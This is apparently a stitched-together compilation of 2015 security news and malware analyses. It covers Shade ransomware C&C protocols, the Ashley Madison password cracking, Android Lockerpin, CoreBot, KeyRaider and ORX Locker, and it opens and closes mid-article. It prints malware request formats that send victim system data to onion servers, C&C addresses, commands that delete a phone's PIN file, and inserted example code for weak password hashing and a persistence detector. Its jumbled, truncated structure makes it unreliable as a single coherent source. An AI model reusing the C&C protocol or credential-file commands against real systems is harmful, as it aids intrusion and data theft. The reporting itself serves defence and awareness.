Report about the encryptor’s current stage:
GET http://<server>.onion/prog.php?i=ID&b=build&v=version&ss=stage&c=count&f=finish
count – the current count of encrypted files;
finish – the flag showing that encryption has completed.
Information about the system:
key_number – the number of the selected RSA key (if the key was not received from the server, but selected from the keys contained in the Trojan’s body);
info – information collected from the infected computer:
Computer name
User name
IP address
Computer domain
List of logical drives
Windows version
List of installed software
Request for a list of URL addresses from which additional malware needs to be downloaded and launched:
GET http://<server>.onion/cmd.php?i=ID&b=build&v=version
Propagation of the encryptor

Partnership program

The code that the user is prompted to email to the cybercriminals can have the form ID|0 if the public key was received from the C&C server, or ID|key_number|build|version if one of the public RSA keys hardcoded in the Trojan’s body was selected, with the corresponding number used for the value key_number. ID is the identity of the infected computer; build and version are numeric values that denote respectively the ID of the specific Trojan sample and the encryptor’s version.

While analyzing the Trojan’s samples, we detected several combinations of the ‘build’ value, email addresses used to communicate with the cybercriminals, and C&C addresses. Different ‘build’ values are associated with different email addresses, although the same C&C can serve several different samples of the Trojan:

build C&C email
2 a4yhexpmth2ldj3v.onion
2 a4yhexpmth2ldj3v.onion
4 a4yhexpmth2ldj3v.onion
6 a4yhexpmth2ldj3v.onion
2 e4aibjtrguqlyaow.onion
15 e4aibjtrguqlyaow.onion
12 gxyvmhc55s4fss2q.onion
14 gxyvmhc55s4fss2q.onion
4 gxyvmhc55s4fss2q.onion
We observed the propagation of different samples from the encryptor’s two versions. For each specific sample of the same version of the Trojan there existed a unique combination of ‘build’ (ID of the specific sample) and the email address (for communication with the cybercriminals).

Although we found no partnership notices, based on the data we can assume the Trojan is distributed, and the ransom collected, via a partnership network. Possibly, the malware sample IDs (the ‘build’ value) and the different email addresses are associated with various partners responsible for distributing this malicious program.


Most of the Trojan infections occur in Russia, Ukraine and Germany. According to KSN data, the distribution of Trojan-Ransom.Win32.Shade is as follows.

Russia 70.88%
Germany 8.42%
Ukraine 6.48%
Austria 3.91%
Switzerland 2.98%
Poland 1.45%
Kazakhstan 1.20%
Belarus 1.07%
Brazil 0.55%
Downloaded malware: Trojan for brute forcing website passwords

Among the malicious programs downloaded by Trojan-Ransom.Win32.Shade is a trojan used for brute forcing website passwords. The internal organization of the brute forcer is very similar to that of the encryptor Trojan itself – it was most probably created by the same team of cybercriminals. This downloaded brute forcer Trojan has been assigned the verdict Trojan.Win32.CMSBrute.

Common features of the CMSBrute family

Written in C++ using STL and its own classes.
Statically linked with the Tor client.
Uses boost (threads), curl, OpenSSL libraries.
Each sample has a hardwired URL to one C&C server. A total of three C&C server addresses were detected in different samples. All the C&Cs are located in the Tor network and are different from the addresses encountered in the Trojan-Ransom.Win32.Shade samples.
All strings (along with the names of imported functions) are AES encrypted. When the program launches, they are decrypted and the import table is then dynamically populated.
Typically UPX packed. Once unpacked, it is 2080-2083 KB in size.
Copies itself to one of the C drive folders with the name csrss.exe.
Downloads additional DLL plugins. The plugins contain code that determines the content management system (CMS) installed on the targeted site, searches for the administration console and cracks passwords. We have detected plugins for websites based on Joomla, WordPress and DataLifeEngine.
Communication with the C&C server

Each sample of Trojan.Win32.CMSBrute contains the address of one C&C server. The servers are located in the Tor network and communication with them is established using the Tor client that is statically linked to the Trojan.

The sample sends the following requests to the C&C server:

Register new bot:
GET http://<server>.onion/reg.php?n=ID&b=build&v=version&sf=stage
ID – the ID of the infected computer. It is calculated using a slightly different algorithm than the one used for the Shade encryptor;
build – the ID of the specific sample of the malicious program. We have encountered build 1 only;
version – the version of the malicious program. We have encountered version 1 only;
stage – the stage of the Trojan’s operation.
A request to receive URL addresses for downloading/updating DLL plugins.
GET http://<server>.onion/upd.php?n=ID&b=build&v=version&p=plugins
Request for a task to determine the CMS on the website and to check the login credentials:
GET http://<server>.onion/task.php?n=ID&b=build&v=version&p=plugins
plugins – the versions of installed DLL plugins.
The server’s response comes in the JSON format and contains URLs of the websites to be attacked and a dictionary for breaking passwords.
Send a brute force report:
POST http://<server>.onion/rep.php?n=ID&b=build&v=version&rep=report
report – a JSON string containing a report about the CMS found on the website, as well as broken login credentials to the administration console.

In the case of Trojan-Ransom.Win32.Shade, all advice that was previously given on how to counteract encryptors is still relevant. Detailed instructions are available at:

If your computer has already suffered an attack by this Trojan, it is extremely important that you run a full scan and treat it with an anti-malware solution. Remember that Trojan-Ransom.Win32.Shade downloads and installs malware belonging to several different families, as stated at the beginning of this article.


The following samples were used while writing this article:

Verdict MD5
Trojan-Ransom.Win32.Shade.ub 21723762c841b2377e06472dd9691da2
Trojan-Ransom.Win32.Shade.ui bb159b6fe30e3c914feac5d4e1b85a61
Trojan.Win32.CMSBrute.a 543d1620ce976cb13fec190ccc1bc83a

Another computer system at the Pentagon has been hacked


Another cyber attack hit computer systems at the Pentagon; this time the food court computers were hacked, exposing employees’ bank information.
In August, alleged Russian hackers breached an unclassified email server of the Pentagon, just one of the numerous attacks against US Government systems.

According to NBC News, US officials reported that Russia launched a “sophisticated cyberattack” against the Pentagon’s Joint Staff unclassified email system. The unclassified email system was shut down and taken offline for two weeks. The officials added that the cyber attack compromised data belonging to 4,000 military and civilian personnel who work for the Joint Chiefs of Staff.

“According to the officials, the ‘sophisticated cyber intrusion’ occurred sometime around July 25 and affected some 4,000 military and civilian personnel who work for the Joint Chiefs of Staff,” states NBC News.

Now, reportedly the computer systems of Pentagon’s food court were breached by attackers and financial details of an unspecified number of employees have been compromised.

On Tuesday, Defense Department spokesman Lt. Col. Tom Crosson confirmed the incident and the exposure of the credit card data of employees who paid at concessions at the Pentagon.


The US authorities immediately notified the employees who had used either a debit or a credit card for payments of the data breach.

“Within the past week, the Pentagon Force Protection Agency has received numerous reports of fraudulent use of credit cards belonging to Pentagon personnel. These individuals had fraudulent charges to their account soon after they had legitimate transactions at the Pentagon,” according to a copy of the notice to employees obtained by the Washington Examiner.
Crosson did not provide further information on the attack, nor data on the number of employees affected; it is still unclear which food court was attacked.

The US government has suffered several major cyber attacks recently, including the recent hack of the Office of Personnel Management (OPM) and of the network at the White House. In August, the New York Times published an article saying that the president of the United States, Barack Obama, had decided to retaliate against China after the notorious hack of the OPM, which exposed over 20 million personal records.

In April, President Barack Obama signed an executive order that uses economic restrictions to “control” anyone trying to attack American interests.

The news of this new attack comes a few days after the announcement that the US Government is considering sanctions against both Russian and Chinese hackers in response to the hacking campaign targeting US entities.

The news was reported yesterday by several U.S. officials who spoke on condition of anonymity. The Obama administration was already considering punishing hackers and organizations targeting US entities; it recently proposed sanctions for Chinese hackers, as well as individuals and firms from other nations responsible for cyber attacks against American commercial companies.



Anyone who owns a Synology NAS should patch the Synology Video Station software as soon as possible: several serious SQL injection vulnerabilities and a command injection vulnerability were found in it. In the worst possible configuration (with the “public share” option enabled), the latter allows a remote attacker to execute arbitrary commands, and with root privileges at that. Let us hope that none of the users of these NAS devices meets, in the foreseeable future, the same disaster that struck in several cases last year, when attackers used an already known and patched vulnerability to infect systems with the CryptoLocker ransomware.

NIST (National Institute of Standards and Technology) is funding several startup projects working on touchless fingerprint readers. The official reason is to speed up the whole fingerprint-reading process, along with concerns about hygiene. Personally, I would be more worried about possible abuse of such a device, whether by criminals or by various government organizations.

Seagate wireless drives (Seagate Wireless Plus Mobile Storage, Seagate Wireless Mobile Storage and LaCie FUEL) contain serious vulnerabilities: Direct Request (‘Forced Browsing’), Unrestricted Upload of File with Dangerous Type, and also an undocumented telnet service accessible with the username and password root. Thanks to the user with the nickname Jenda for the tip.

The Adult Player app for Android promised pornographic material; instead, it secretly took photographs of its users. This ransomware then displayed them on the phone’s screen together with a demand for a payment of 500 dollars.

Users of the dating site Ashley Madison have another problem. Within ten days, more than 11 million user passwords were cracked. Members of the CynoSure Prime group set about analysing the leaked source code of the site. They found that some users have their loginkey created using MD5. The loginkey variable contains both the username and the password, but both are stored with all letters converted to lower case. Even though the passwords are modified in this way, it helped speed up recovery of passwords from the leaked password hashes, which were created with the bcrypt function and would have been too expensive to crack without this help. Thanks to their work we can admire the list of the thirty worst passwords from Ashley Madison. Is anyone still surprised that the password 123456 was used by 120,511 users?

The malware Android.Trojan.Mkero.A was found in a number of apps and games directly in Google Play. It has been known since 2014, but this is its first appearance in the official Google Play store. This Trojan horse can bypass CAPTCHA protection by forwarding the image to an online service, which within moments returns the needed result to the malware. In addition, it can also find the necessary activation code in SMS messages. The malware is used to subscribe users to premium services, naturally without their knowledge. Among the apps in Google Play that contained this malware were two with several hundred thousand downloads.

Ninety-one percent of Americans reportedly believe that the benefit of adding backdoors to encryption mechanisms justifies the associated risks. Perhaps the whole survey follows the motto “I only trust statistics I have falsified myself”.

Hackers have already cracked 11 million passwords stolen from the dating site Ashley Madison

13.9.2015 Hacking

Today, Milan Šurkala, news

In July, hackers stole the records of more than 36 million people from the dating site Ashley Madison, which specialises in finding partners for marital or other infidelity. The data was published, and 11 million passwords hashed with MD5 have already been cracked.

Ashley Madison is an online dating site used to find partners for infidelity. In July 2015, however, it was hacked, and hackers from the group The Impact Team were able to obtain the data of over 36 million users of the site. The passwords were hashed with the bcrypt algorithm, which should take at least decades to crack. The amateur group CynoSure Prime took this stolen data and discovered an interesting fact. Although many of the passwords really are hashed with bcrypt and are therefore essentially uncrackable in a normal time frame, around 15 million passwords, while stored with bcrypt, also came with an MD5 hash. And MD5 is such a weak hashing algorithm that it can be cracked practically instantly.
It was not hard to discover that this MD5 hash consists of the username converted to lower case, two colons, and the password, also converted to lower case. Since the username is known and the colons are easy to append, only all possible password combinations need to be tried by brute force. Because it is an MD5 hash, this can be done extremely fast. Once a password falls out, the obtained password is hashed with bcrypt. If the result matches the one in the database, the password is cracked. If it does not match, it is clear that it was converted to lower case, and various combinations of lower- and upper-case letters of the already cracked word are tried. For a password with 8 letters that is 2^8, i.e. 256 combinations in total (instead of “heslo”, for example, “Heslo” or “HESLO” is tried). That is not unmanageable.

In practice, however, this was essentially not needed, because 90% of users had passwords with all lower-case letters, so this operation had to be performed in only 10% of cases. In this way they cracked over 11 million passwords out of 15.26 million in total. Roughly 240 thousand they failed to crack: no combination of the obtained password matched the bcrypt result in the database. It is possible that the MD5 in the database was a leftover and all new passwords and password changes were already stored using bcrypt only. A user who changed their password might therefore have had the old password hashed with MD5 in the database, no longer updated, while the new password was stored only in bcrypt. But this is just speculation.

Cracking these 11 million passwords took around 10 days, so by early next week all 15 million passwords hashed with the inadequate MD5 method should be cracked. Another 20+ million accounts used bcrypt only, and it should not be possible to crack them in a reasonable time. The CynoSure Prime group has no interest in publishing these passwords; it only wants to demonstrate how easy it was to break this protection. Recall that a presence on Ashley Madison is not flattering for a person, since it suggests they had an affair. Indeed, at least one person has already taken their own life because of the publication of this sensitive information.
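The loginkey construction described above, MD5(lower(username) + “::” + lower(password)), written out next to a hardened alternative, as an added example (not code from the article or from CynoSure Prime). The hardened design is this example’s own assumption: a random per-login token that never derives from the password and is stored only as a SHA-256 digest.

```python
"""Added example (not from the article or CynoSure Prime): the weak loginkey
scheme beside a hardened token store. It shows why a fast, unsalted, case-folded
digest of the plaintext password stored next to a slow bcrypt hash gives the
bcrypt hash no protection to speak of."""
import hashlib
import secrets


def weak_loginkey(username, password):
    """The leaked scheme: one unsalted MD5 of case-folded username::password.

    Case folding means every spelling of the same letters collapses to the same
    digest, and MD5 is fast enough to try candidate passwords at enormous rates.
    """
    material = f"{username.lower()}::{password.lower()}"
    return hashlib.md5(material.encode("utf-8")).hexdigest()


def case_variants(word):
    """How many upper/lower-case spellings a lower-cased word could have come from.

    Only letters have two cases, so the count is 2 ** (number of letters); this is
    the 2^8 = 256 figure the article gives for an eight-letter password.
    """
    return 2 ** sum(ch.isalpha() for ch in word)


class TokenStore:
    """Hardened alternative (assumed design): random login tokens, stored hashed.

    A token is 256 bits from the OS CSPRNG, independent of the password, so
    leaking this table reveals nothing about passwords and cannot be used to
    speed up attacks on the bcrypt hashes. Only SHA-256 digests are kept, so a
    leaked table does not even yield usable tokens.
    """

    def __init__(self):
        self._digests = {}  # sha256(token) -> username

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue(self, username):
        """Create and return a fresh token for username (store keeps the digest only)."""
        token = secrets.token_hex(32)
        self._digests[self._digest(token)] = username
        return token

    def verify(self, token):
        """Return the username for a valid token, or None."""
        # The lookup key is the digest of a high-entropy token, so a dictionary
        # lookup is sufficient; there is no low-entropy secret to compare.
        return self._digests.get(self._digest(token))

    def revoke(self, token):
        """Invalidate a token; returns True if it was present."""
        return self._digests.pop(self._digest(token), None) is not None


if __name__ == "__main__":
    # Constructed credentials, not from any leak.
    print(weak_loginkey("Alice", "Heslo123") == weak_loginkey("ALICE", "heslo123"))
    print(case_variants("password"))
    store = TokenStore()
    t = store.issue("alice")
    print(store.verify(t), store.revoke(t), store.verify(t))
```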

These Top 30 Ashley Madison Passwords are just as Terrible as You'd Think


Yes, you heard it correct!

First the password cracking team ‘CynoSure Prime’ cracked more than 11 million Ashley Madison passwords in just 10 days (quite an achievement, though); now a member of the team has shared the same list of passwords with a few calculations.

The calculations are...

...What passwords are mostly used and by how many users? Terrible?

Out of 11 million passwords, only 4.6 million were unique, and the rest were as weak and horrible as one could imagine.

Ars Technica, which CynoSure Prime updated with the news, published the calculations and says that the figures are expected to change as the team is still left with 3.7 million passwords to crack.

Going through the list of passwords, the top 5 used were:
123456 by 120511 users
12345 by 48452 users
password by 39448 users
DEFAULT by 34275 users
123456789 by 26620 users
For more, see the list of passwords in the image above.
AND, Even a 5th grader can literally guess these Passwords!

Apple Boosts iOS 9 Security with improved Two-Factor Authentication


Apple iOS 9, codenamed Monarch, will be available to the world on September 16th.
While most of the upgrades on iOS 9 focus on making devices:
and more efficient.
Today we are going to discuss the improved Two-Factor Authentication (2FA) pumped within the new iOS operating system.
Apple has strengthened the foundation of iOS 9 and further of your device by modifying the operating system with an improved two-factor authentication built into it.
As the two-factor authentication structure lies within the operating system, this makes the device's Apple ID even harder to break.
2FA secures your Apple ID by acting as an additional support to protect your data on your device, preventing any intrusion to occur on your device.
Also, when you have more than one device running Apple’s operating system, 2FA enables sign-in on a new device in a streamlined manner…
...Besides verifying your identity by entering your password, Apple will generate a six-digit verification code in the next step that is either displayed on the Apple device through which you are logging in, or you can choose to receive it through an SMS or via a phone call.
Things to pay attention to:
Remember your password and set up a device passcode on all your devices.
Remember to keep your devices secure from any external threat like theft.
Remember to update your trusted devices on time.
All of this makes it easier for you and difficult for the intruder to gain access to your information.
We’ve been saying improved and robust 2FA comes with iOS 9, yes, it has improved and follows a different method of verifying you and building trust.
If you are an iOS user and want to learn about your device’s security, follow the Apple support page explaining the same.
Apple ID is your identity on Apple's various services including iCloud, Apple Pay and many more.
The enhanced security features built into iOS 9 help you keep your Apple devices as well as Apple ID safe by:
Strengthening the Passcode that protects your devices
Improving Two-Factor Authentication that is built directly into iOS
These features make it harder for hackers, intruders or others to "gain unauthorized access to your Apple ID," said Apple.
Past attacks such as the ‘Snappening’ and ‘Fappening’, as well as threats such as iOS zero-day exploits able to capture a user’s password, are a few examples that make the case for the new two-factor authentication.
Moreover, iOS 9 boasts of various improved features like battery optimization, several built-in apps and enhanced security for all the devices.
Apple also claimed that it is the most intelligent of the lot, providing Proactive assistance through Siri. The all-new Proactive feature will offer users contextual suggestions based on their habits, location, or time of day.
As already mentioned, iOS 9 will be available to the public from September 16 onwards. The operating system comes as a free update for all users of the iPhone 4s and later, iPod touch 5th generation and above, iPad 2 and above, and iPad mini and later.

iOS 9 boosts iPhone 6s and iPad Pro security with improved 2FA


The latest edition of Apple’s mobile operating system comes with enhanced security features, the company has announced.
Available from September 16th on the iPhone, iPad and iPod, iOS 9 offers users even greater protection from a variety of threats, and ensures that personal information and sensitive data remains secure.
Stronger passcode and improved 2FA offers exceptional protection

After the iCloud scandal from last year, which saw attackers leak nude photos of celebrities, Apple has been eager to restore its security credibility.
Two key developments will offer users even greater reassurance that this is the case: a stronger passcode and a revamped two-factor authentication process (2FA).
By building the latter directly into the operating system, the tech giant has made it markedly more difficult for attackers “to gain unauthorized access” to a user’s Apple ID.
2FA is a supplementary security feature. For example, it ensures that devices remain secure even after a cybercriminal has managed to get hold of a password – another process is still required to gain access.
“Your Apple ID is the key to many things you do with Apple,” the company has explained.
“Two-step verification is a feature you can use to keep your Apple ID and personal information as secure as possible.”
Game-changing iPad Pro has Touch ID tech for added security

The iOS update was announced at Apple’s latest and highly anticipated Keynote event in San Francisco, which saw the tech giant also announce the latest edition to the iPad family, the iPad Pro.
Now the largest device in the series (it has a 12.9-inch display), the hi-tech iPad Pro comes with Touch ID technology to help keep the device safe and secure.
According to Apple, this helps to transform “your fingerprint into an unforgettable password”, meaning that when this feature is activated, it cannot be unlocked by anyone else.
Apple backs privacy of its users

Against the backdrop of the Keynote event, Apple has hit the headlines over its commitment to protecting user data.
The New York Times reported that the tech giant is unwilling to bow down to government pressure to hand over personal information sent via iMessage.
“In an investigation involving guns and drugs, the Justice Department obtained a court order this summer demanding that Apple turn over, in real time, text messages between suspects using iPhones,” the news provider outlined.
In response, Apple said that it was unable to do this because its messaging service is encrypted – it cannot “comply” with this request.
Simply put, due to the unique design of iMessage – and FaceTime – it is impossible for Apple to make sense of the data that is being sent between devices.
Further, as it states online, this is something that it is keen to avoid. Apple wants this information to remain private:
“Your communications are protected by end-to-end encryption across all your devices when you use iMessage and FaceTime, and with iOS 9 and Watch OS, your iMessages are also encrypted on your device in such a way that they can’t be accessed without your passcode.
“Apple has no way to decrypt iMessage and FaceTime data when it’s in transit between devices.”

Aggressive Android ransomware spreading in the USA


We have been following the evolution and mass spreading of Android ransomware for a while now. After seeing early ransomware families combining fake antivirus with the ability to lock the device’s screen (Android Defender, for example), last year we discovered Simplocker, the first Android ransomware to actually encrypt user files. This time, ESET researchers have discovered the first known Android lock-screen-type ransomware spreading in the wild that sets the phone’s PIN lock.
In previous Android LockScreen Trojans, the screen-locking functionality was usually achieved by constantly bringing the ransom window to the foreground in an infinite loop. While various self-defense mechanisms were implemented to keep the device user locked out, it wasn’t too difficult to get rid of the malware and thus unlock the device by using Android Debug Bridge (ADB) or by deactivating Administrator rights and uninstalling the malicious application in Safe Mode.
Unfortunately, malware writers have stepped up their game, and with the new Android ransom-lockers, detected by ESET as Android/Lockerpin.A, users have no effective way of regaining access to their device without root privileges or without some other form of security management solution installed, apart from a factory reset that would also delete all their data.
Moreover, this ransomware also uses a nasty trick to obtain and preserve Device Administrator privileges so as to prevent uninstallation. This is the first case in which we have observed this aggressive method in Android malware.

After a successful installation, the malware tries to obtain Device Administrator privileges. This trick is being used by Android malware authors more and more, as it makes it more difficult to remove the infection. Earlier versions of this Android/Locker family do this in just the same way as all other Android Trojans – they rely on the user willingly activating the elevated privileges.
In the latest versions, however, the Trojan obtains Device Administrator rights much more covertly. The activation window is overlaid with the Trojan’s malicious window pretending to be an “Update patch installation”. As the victims click through this innocuous-looking installation they also unknowingly activate the Device Administrator privileges in the hidden underlying window.

Figure 1: Hidden device administrator activation
After clicking on the button, the user's device is doomed: the Trojan app has silently obtained Administrator rights and can now lock the device and, even worse, set a new PIN for the lock screen.
Not long after, the user will be prompted to pay a US$500 ransom for allegedly viewing and harboring forbidden pornographic material.

After this bogus alert is displayed, the screen is locked, in typical Android Trojan lockscreen fashion. The user may now uninstall Android/Lockerpin.A either by going into Safe Mode or using Android Debug Bridge (ADB). However, after any ransom activity the PIN will be reset and neither the owner nor the attacker can unlock the device, because the PIN is generated randomly and is not sent to the attacker. The only practical way to unlock is to reset to factory defaults – if the device is not rooted.
Figure 3: PIN lock screen
The device is now permanently locked and it’s impossible to unlock it without root privileges.
Locker self-defense

Not only does Android/Lockerpin.A acquire Device Admin privileges in a novel and covert manner, it also uses an aggressive self-defense mechanism to make sure it keeps them. When users attempt to deactivate Device Admin for the malware, they will fail because the Trojan will have registered a call-back function to reactivate the privileges when removal is attempted.
Similarly to when Device Administrator is first activated by the Trojan, if a removal attempt is made the Device Administrator window is again overlaid with a bogus window as shown in Figure 4. Pressing Continue effectively reactivates the elevated privileges.
Figure 4: Overlapping activity
As an extra layer of self-protection, the ransomware also attempts to kill running AV processes when the user tries to deactivate its Device Admin rights. The Trojan tries to protect itself from three mobile anti-virus applications: ESET Mobile Security and also Android solutions by Avast and Dr.Web.
Figure 5: Killing running processes
It also watches for the application manager being opened – this is an attempt to prevent standard uninstallation through Android's built-in application manager.
Luckily, with our own self-protection mechanisms in place, the malware will not succeed in killing or removing ESET Mobile Security.
Distribution vector and prevalence statistics

This Trojan uses social engineering techniques to trick users into installing it. The ransomware pretends to be an app for viewing adult/porn videos. In all cases that we have observed, the application calls itself "Porn Droid".
Based on ESET’s LiveGrid® statistics, most of the infected Android devices are in the USA, with a percentage share of over 75 per cent. This is part of a trend where Android malware writers are shifting from mostly targeting Russian and Ukrainian users to largely targeting victims in America, where arguably they can make bigger profits.

Unlocking the device

The only way to remove the PIN lock screen without a factory reset is when the device is rooted or has an MDM solution installed that is capable of resetting the PIN. If the device is rooted, the user can connect to it via ADB and remove the file where the PIN is stored. For this to work, the device needs to have debugging enabled (Settings -> Developer options -> USB Debugging); otherwise it's not possible. The user can use the following set of commands to unlock the device:
> adb shell
> su
> rm /data/system/password.key
After running the above commands, the PIN or password lock screen will be removed and the user can get into the device. In some cases, a device reboot is needed.

Fortunately, you can’t download this application from the official Google Play Store. This Trojan can be delivered to users from third party markets, warez forums or torrents. The most effective way to avoid getting infected and being locked out from your device is by proactive preventative measures. We strongly advise users to keep their Antivirus software up-to-date. ESET Mobile Security detects this threat as Android/Lockerpin.A.

LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones


Your device's lock screen PIN is believed to keep your phone's contents safe from others, but sadly not from a new piece of ransomware that can hijack the security of your Android device.

A group of security researchers has uncovered what is believed to be the first real example of malware that is capable of resetting the PIN code on a device and permanently locking the owner out of their own smartphone or tablet.

This Android PIN-locking ransomware, identified as Android/Lockerpin.A, changes the infected device's lock screen PIN code and leaves victims with a locked mobile screen, demanding a $500 (€450) ransom.

Here's the Kicker:

Since the lock screen PIN is reset randomly, even paying the ransom won't give you back access to your device, because even the attackers don't know the changed PIN code, warn security researchers at Bratislava-based antivirus firm ESET.

LockerPIN, as the researchers dubbed it, is being spread through adult entertainment apps installed from third-party websites, warez forums and torrents – outside of the official Google Play Store.

The app in question is Porn Droid, the second of its kind observed recently after Adult Player – another porn-themed Android app that takes selfies of its users and includes them in its ransom messages.

How Does LockerPIN Work?

Once installed on the victim's smartphone, the app first tricks users into granting it device administrator rights. It does so by disguising itself as an "Update patch installation" window.

After gaining admin privileges, the malicious app goes on to change the user's lock screen PIN code, using a randomly generated number.

This random number is not even sent to the attacker, meaning that even after victims pay the ransom, nobody can unlock the device's screen.

Though the majority of infected devices are detected within the United States, the researchers have spotted the infections worldwide.

How to Get Rid of this LockerPIN Ransomware?

Unfortunately, there is "no effective way" to regain access to infected devices without losing personal data.

Rebooting the device in Safe Mode and uninstalling the offending application or using Android Debug Bridge (ADB) alone won't solve the issue.

The only way to unlock the device and get rid of LockerPIN ransomware app is to perform a factory reset that would wipe out all the personal data and apps stored on your device.

Ransomware delivered through malicious apps is growing and becoming more sophisticated with time, and this newly discovered LockerPIN ransomware proves the point.

The bottom line:

To avoid falling victim to malicious apps like Porn Droid and Adult Player, the saving grace for users is:
Don't install apps outside of the Google Play Store.
Don't grant administrator privileges to apps unless you truly trust them.



UPnP – the letters denoting a set of network protocols stand for Universal Plug and Play. But they also hide a danger for your network if you have UPnP support enabled on your router.

According to a warning issued by the CERT at Carnegie Mellon University, most devices generate insufficiently random identifiers that are used in UPnP communication. An attacker can therefore guess them and use the UPnP protocol to open ports on the router or perform other actions that otherwise only the router's administrator can do. This opens a path into your entire home network.

Demonstration of a Filet-O-Firewall attack carried out in just a few seconds

Exploiting this vulnerability in combination with other attacks makes it possible to create a malicious web page. If the victim visits it from the Chrome or Firefox browser with JavaScript enabled, UPnP requests are immediately sent to their router, opening a door into the victim's network. This whole combination of attacks has been named Filet-O-Firewall and already has its own website, which among other things contains details of the attack and a list of vulnerable routers.

The blame for this danger can to some extent be laid on the manufacturers who use the UPnP protocol. The protocol itself does not support any form of authentication and assumes that authentication mechanisms will be implemented in the device itself. In the vast majority of cases, however, this is not done and the devices are vulnerable. If you want to protect yourself, we recommend disabling UPnP support on the device, at least until manufacturers release fixes.

SleepyPuppy - a tool from Netflix hunts thoroughly for XSS

Recommending that you use a tool called "Sleepy Puppy" to hunt for XSS vulnerabilities doesn't sound very secure. The truth is, though, that the puppy sniffs around while you can sleep in peace. Its main advantage is the ability to uncover so-called delayed XSS vulnerabilities in secondary applications. These can show up when one web application processes user input and stores it in a database, from which another web application loads the same data and displays it.

How the SleepyPuppy tool works to uncover delayed XSS vulnerabilities

When using SleepyPuppy, a script is inserted into the input data which, if an XSS vulnerability exists, sends a report about it to the server with many details. Among them are the URL, the referrer, a screenshot, cookies, the user agent and the Document Object Model (DOM).

Example of an XSS vulnerability record

If you wish, you can also receive an email with this information when a bug is found. This may happen weeks or months after testing begins. If you feel like playing with this puppy, its source code is available on GitHub.

CoreBot - new malware focused mainly on stealing login credentials

Modular architecture isn't just for large applications. As a report from IBM Security X-Force experts states, the new CoreBot malware also makes successful use of it. Thanks to this, new mechanisms for data theft and control of infected computers can easily be added to it.

CoreBot first uses a dropper for installation, which launches the svchost process to write the malware's files to disk and then runs them. CoreBot then generates a unique ID, which it stores in the registry to ensure it runs at system startup. It is therefore possible to find, for example, this entry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\f9111abc-8f81-200b-8b4a-bd8fd4a43b8h

CoreBot then connects to a C&C server, from which it downloads its plugins and receives commands. The C&C server address differs according to the location of the infected machine. Currently CoreBot sends its communication to two domains (vincenzo-sorelli[.]com and arijoputane[.]com), both registered to the same owner with a Russian address.

From there it downloads what is so far the most used plugin, named Stealer. It serves to steal saved passwords from all currently popular web browsers. It also looks for data from a large number of FTP and email clients, webmail services, cryptocurrency wallets, private certificates and personal data from various desktop applications.

Antivirus solutions do not yet recognise this malware directly as CoreBot, but they can detect it. Its detections are most often labelled with names such as Dynamer!ac or Eldorado.
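A defender-side check for the persistence pattern described above, written as an added example (it is not code from the IBM X-Force report): it lists autostart entries under the Run keys whose value name has the GUID-like shape of the quoted CoreBot entry. The Wow6432Node path and the loose name pattern are assumptions; a hit is a lead for investigation, not proof of infection, because some legitimate installers also use GUID-named Run entries.

```powershell
# Added example: report Run-key autostart entries with GUID-like value names.
# Works on PowerShell 2.0 and later (Windows 7 and newer).

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'   # assumed: 32-bit view on 64-bit Windows
)

# Loose 8-4-4-4-12 GUID shape. Letters beyond a-f are allowed on purpose:
# the sample name quoted in the article ends in a non-hex character.
$guidLike = '^[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}$'

$findings = @()
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Skip PowerShell's own metadata properties (PSPath, PSParentPath, ...)
        if ($p.Name -like 'PS*') { continue }
        if ($p.Name -imatch $guidLike) {
            $cmd = [string]$p.Value
            # Extract the executable path: quoted path first, otherwise the first token
            $exe = if ($cmd -match '^"([^"]+)"') { $matches[1] } else { ($cmd -split '\s+')[0] }
            $findings += New-Object PSObject -Property @{
                Key     = $key
                Name    = $p.Name
                Command = $cmd
                Exists  = (Test-Path -LiteralPath $exe)   # missing file can mean the dropper already cleaned up
            }
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Host 'No GUID-named Run entries found.'
} else {
    # Review each hit: submit the file to your AV vendor or hash it for comparison
    $findings | Format-Table Key, Name, Exists, Command -AutoSize
}
```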

KeyRaider steals certificates, keys and logins from jailbroken iPhones

Owners of Apple devices running iOS who decided to jailbreak them may be infected by the new KeyRaider malware family. It is bundled with some jailbreak tools. It was found, for example, on Weiphone, one of the largest Chinese portals for Apple fans, specifically in its Cydia repository. Unfortunately it is successful: it has already compromised more than 225,000 Apple accounts.

KeyRaider focuses on stealing Apple accounts, which attackers can then use to download paid applications. According to the Palo Alto Networks blog, however, the malware also collects certificates and private keys from infected devices. In some cases the malware also locked the phone and a ransom was demanded from the owner.

Message urging the victim to contact the attackers in order to unlock the phone

Analysts examining the KeyRaider malware managed to get onto the C&C server and gain access to a database holding 225,941 stolen logins. Among the email addresses of the user accounts were addresses in the .cz domain.

Becoming a cybercriminal the easy way, thanks to the ORX Locker service

There are certainly plenty of ways to make money illegally on the internet. Most of them, however, are not for everyone, unlike the new ORX Locker service, with which even your grandmother could earn some extra cash.

It is another service offering ransomware-as-a-service. We wrote in June about what was probably the first service of its kind, named Tox. Compared to Tox, ORX Locker offers sophisticated methods of hiding from detection by antivirus programs and uses a complex infrastructure for its communication, including university servers and transfers over TOR.

Screenshot of the ransomware-building platform

To create the ransomware, you just need to register on the site; no email or personal details are required. It is even possible to earn extra money by luring in further customers and, through a referral program, receive 3% of every payment they collect.

To download the exe file with the virus, you need to enter a unique ID and the ransom amount. Then you click Build EXE and can start sending the program to your victims. Once their data has been encrypted, they have 96 hours to pay.

Payment instructions that the victim finds in an html file on their desktop

On the service's website, the user can conveniently track how many computers they have managed to infect, when and how many files were encrypted, and how much profit each victim brought them. These funds can then be withdrawn from the ORX Locker service by transferring them to a specified bitcoin wallet. Ransom payments are likewise restricted to Bitcoin only.

Here's How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically


installation files — between 3.5GB and 6GB — onto users' PCs even if they have not opted into the upgrade.
